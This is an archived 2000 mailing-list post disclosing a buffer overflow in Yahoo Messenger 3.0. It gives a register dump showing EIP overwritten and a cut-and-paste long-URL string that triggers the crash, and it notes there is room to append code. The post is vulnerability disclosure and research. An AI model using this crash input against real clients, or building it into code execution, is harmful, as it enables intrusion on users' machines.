Vulnerability Development mailing list archives
Yahoo Pager Update
From: Blake Frantz <blake () mail mc net>
Date: Fri, 1 Sep 2000 19:16:12 -0500
YM update: In my original post I stated a URL that was > 1024 was needed to crash YM, this is incorrect. I passed www. <479 "a"'s> .com, a total URL length of 487, (which plenty of space to append addition code : 800 Max) and YM crashes with: eax=00000001 ebx=001b3715 ecx=0012fe88 edx=77e694a0 esi=0012f958 edi=00000328 eip=46464646 esp=0012e7e8 ebp=46464646 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 and eip is overwritten. I have notified yahoo and they responded with a generic reply from messenger-help () yahoo-inc com. Again, here is the module and OS info: Yahoo Messenger 3,0,0,770 MyYahoo Module 2,0,0,348 Windows 2000 Professional 5.000.2195. <cut and paste this to try> www.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaa.com <end cut> Blake Frantz
Current thread:
- Yahoo Pager Update Blake Frantz (Sep 01)